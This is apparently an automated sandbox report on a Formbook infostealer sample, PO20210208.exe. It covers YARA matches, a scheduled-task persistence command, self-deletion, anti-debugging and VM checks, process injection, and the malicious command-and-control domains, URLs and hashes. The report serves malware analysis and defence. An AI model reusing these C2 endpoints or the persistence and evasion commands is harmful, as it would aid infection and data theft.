Source: 00000011.00000002.536617953.0000000000E80000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.536617953.0000000000E80000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.536570709.0000000000E40000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.536570709.0000000000E40000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.373023982.0000000001C10000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.373023982.0000000001C10000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.536321895.0000000000B10000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.536321895.0000000000B10000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.371759011.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.371759011.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.372992158.0000000001BE0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.372992158.0000000001BE0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: PO20210208.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: jzJlVLOvvNOn.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5644:120:WilError_01
Source: C:\Users\user\Desktop\PO20210208.exe	Mutant created: \Sessions\1\BaseNamedObjects\XrguVvQjUZLg
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5496:120:WilError_01

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\PO20210208.exe 'C:\Users\user\Desktop\PO20210208.exe'
Source: C:\Users\user\Desktop\PO20210208.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\jzJlVLOvvNOn' /XML 'C:\Users\user\AppData\Local\Temp\tmpF078.tmp'
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PO20210208.exe	Process created: C:\Users\user\Desktop\PO20210208.exe C:\Users\user\Desktop\PO20210208.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO20210208.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PO20210208.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\jzJlVLOvvNOn' /XML 'C:\Users\user\AppData\Local\Temp\tmpF078.tmp'	Jump to behavior
Source: C:\Users\user\Desktop\PO20210208.exe	Process created: C:\Users\user\Desktop\PO20210208.exe C:\Users\user\Desktop\PO20210208.exe	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO20210208.exe'	Jump to behavior

Source: C:\Users\user\Desktop\PO20210208.exe	Code function: 10_2_00417A83 push edi; iretd	10_2_00417A84
Source: C:\Users\user\Desktop\PO20210208.exe	Code function: 10_2_0041CEB5 push eax; ret	10_2_0041CF08
Source: C:\Users\user\Desktop\PO20210208.exe	Code function: 10_2_0041CF6C push eax; ret	10_2_0041CF72
Source: C:\Users\user\Desktop\PO20210208.exe	Code function: 10_2_0041CF02 push eax; ret	10_2_0041CF08
Source: C:\Users\user\Desktop\PO20210208.exe	Code function: 10_2_0041CF0B push eax; ret	10_2_0041CF72
Source: C:\Users\user\Desktop\PO20210208.exe	Code function: 10_2_00DC5DAD push ecx; iretd	10_2_00DC5DAE
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_04D7D0D1 push ecx; ret	17_2_04D7D0E4
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_00B27A83 push edi; iretd	17_2_00B27A84
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_00B2CEB5 push eax; ret	17_2_00B2CF08
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_00B2CF02 push eax; ret	17_2_00B2CF08
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_00B2CF0B push eax; ret	17_2_00B2CF72
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 17_2_00B2CF6C push eax; ret	17_2_00B2CF72

Source: initial sample	Static PE information: section name: .text entropy: 7.58418130076
Source: initial sample	Static PE information: section name: .text entropy: 7.58418130076

Source: C:\Users\user\Desktop\PO20210208.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO20210208.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO20210208.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO20210208.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO20210208.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO20210208.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO20210208.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO20210208.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO20210208.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO20210208.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO20210208.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO20210208.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO20210208.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO20210208.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO20210208.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO20210208.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO20210208.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO20210208.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO20210208.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO20210208.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO20210208.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO20210208.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO20210208.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO20210208.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO20210208.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO20210208.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO20210208.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO20210208.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO20210208.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO20210208.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO20210208.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO20210208.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\PO20210208.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PO20210208.exe	RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msiexec.exe	RDTSC instruction interceptor: First address: 0000000000B198E4 second address: 0000000000B198EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msiexec.exe	RDTSC instruction interceptor: First address: 0000000000B19B5E second address: 0000000000B19B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\PO20210208.exe TID: 5928	Thread sleep time: -42274s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO20210208.exe TID: 2224	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2116	Thread sleep time: -42000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4772	Thread sleep time: -50000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\PO20210208.exe	Thread delayed: delay time: 42274			Jump to behavior
Source: C:\Users\user\Desktop\PO20210208.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: explorer.exe, 0000000B.00000000.330328905.0000000008A32000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 0000000B.00000000.330328905.0000000008A32000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 0000000B.00000000.325607302.00000000059C0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 0000000B.00000000.330561681.0000000008B88000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000B.00000000.330561681.0000000008B88000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: explorer.exe, 0000000B.00000000.322661028.00000000048E0000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000B.00000000.330561681.0000000008B88000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
Source: explorer.exe, 0000000B.00000000.330395748.0000000008ACF000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
Source: explorer.exe, 0000000B.00000000.330395748.0000000008ACF000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 0000000B.00000000.326420441.00000000069DA000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD002
Source: explorer.exe, 0000000B.00000000.325607302.00000000059C0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 0000000B.00000000.325607302.00000000059C0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 0000000B.00000000.325607302.00000000059C0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\PO20210208.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\PO20210208.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\PO20210208.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Windows\explorer.exe	Network Connect: 154.207.58.46 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.hickorymontessori.com
Source: C:\Windows\explorer.exe	Network Connect: 199.59.242.153 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.drtimgood.com

Source: C:\Users\user\Desktop\PO20210208.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\PO20210208.exe	Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\PO20210208.exe	Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Source: C:\Users\user\Desktop\PO20210208.exe	Thread register set: target process: 3292			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread register set: target process: 3292			Jump to behavior

Source: explorer.exe, 0000000B.00000000.316551477.0000000001400000.00000002.00000001.sdmp, msiexec.exe, 00000011.00000002.537866547.00000000035C0000.00000002.00000001.sdmp	Binary or memory string: uProgram Manager
Source: explorer.exe, 0000000B.00000000.316551477.0000000001400000.00000002.00000001.sdmp, msiexec.exe, 00000011.00000002.537866547.00000000035C0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000B.00000000.316551477.0000000001400000.00000002.00000001.sdmp, msiexec.exe, 00000011.00000002.537866547.00000000035C0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000B.00000000.316551477.0000000001400000.00000002.00000001.sdmp, msiexec.exe, 00000011.00000002.537866547.00000000035C0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000000B.00000000.316393105.0000000000EB8000.00000004.00000020.sdmp	Binary or memory string: ProgmanX
Source: explorer.exe, 0000000B.00000000.330395748.0000000008ACF000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWndAj

Source: C:\Users\user\Desktop\PO20210208.exe	Queries volume information: C:\Users\user\Desktop\PO20210208.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO20210208.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO20210208.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO20210208.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO20210208.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Windows Analysis Report PO20210208.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
199.59.242.153	www.hickorymontessori.com	United States		395082	BODIS-NJUS	true
154.207.58.46	www.drtimgood.com	Seychelles		136800	XIAOZHIYUN1-AS-APICIDCNETWORKUS	true

Name	Malicious	Antivirus Detection	Reputation
http://www.drtimgood.com/kd8k/?k484cP=6lXxUBgPFXV4ht&FN9t7=Aecc1C2lq3KIOk0Z5e9GHdHOzGpcwGJNxdz75+SI1+BGrXagTsSPYgmle4+aia3bzkQ1M3Kxow==	true	Avira URL Cloud: safe	unknown
http://www.hickorymontessori.com/kd8k/?FN9t7=pHASxN/zB2s8y7031b2M6UpombzKK7jcls/pLxeKoPwZAZ9UGIoJwDMFpIJDyyQaamJqeGG8IQ==&k484cP=6lXxUBgPFXV4ht	true	Avira URL Cloud: safe	unknown
www.drtimgood.com/kd8k/	true	Avira URL Cloud: safe	low

ID:	458732
Product:	CloudBasic
Start time:	17:41:20
Start date:	03.08.2021
Sample:	PO20210208.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	453333db091bf0aa1b44de50ee557b82
SHA1:	2fc782c51a566dc11e47cb27dfaaeac4def8ce84
SHA256:	ac99c0c414eba6afadb236077dd77f506c7f316511a72b70a0f0f630f9b5c416
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO20210208.exe.log	ASCII text, with CRLF line terminators	FED34146BF2F2FA59DCF8702FCC8232E	B03BFEA175989D989850CF06FE5E7BBF56EAA00A	123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
C:\Users\user\AppData\Local\Temp\tmpF078.tmp	XML 1.0 document, ASCII text, with CRLF line terminators	9C99FA2D623FD3F0EC988DDF5EFAC604	802915C489AF37A18100F975142C4F3943F426ED	525A103C23CBD988F8423EFF8F8E06617E3DE30A5DBF47685DAD70241E46DB67
C:\Users\user\AppData\Roaming\jzJlVLOvvNOn.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	453333DB091BF0AA1B44DE50EE557B82	2FC782C51A566DC11E47CB27DFAAEAC4DEF8CE84	AC99C0C414EBA6AFADB236077DD77F506C7F316511A72B70A0F0F630F9B5C416
C:\Users\user\AppData\Roaming\jzJlVLOvvNOn.exe:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309